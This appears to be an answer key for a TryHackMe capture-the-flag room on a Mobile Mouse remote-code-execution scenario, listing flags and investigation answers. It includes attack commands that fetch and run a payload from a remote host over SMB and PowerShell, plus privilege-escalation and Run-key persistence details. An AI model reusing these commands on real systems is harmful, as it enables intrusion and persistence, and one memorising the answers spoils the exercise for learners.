1. 1. THM{Terry_mouse_2_rce}
   2. THM{Terry_1s_th3_4dm1n_n0w}
   3. THM{Mouse_Trouble_#4344#}
2. 1. payload.exe
   2. 10.10.205.235
   3. cmd.exe /c start /B\\10.10.205.235\share\payload.exe
   4. .\SharpUp.exe audit
   5. 8/6/2024 4:14:43 PM
   6. powershell iwr http://10.10.205.235:1234/payload.exe -outfile Mouse.exe
   7. "C:\Program Files (x86)\Mobile Mouse\Mouse” Utilities\HelperService.exe
   8. chazy??123
   9. HKCU\Software\Microsoft\Windows\CurrentVersion\Run
   10. C:\Users\Public\admin.exe
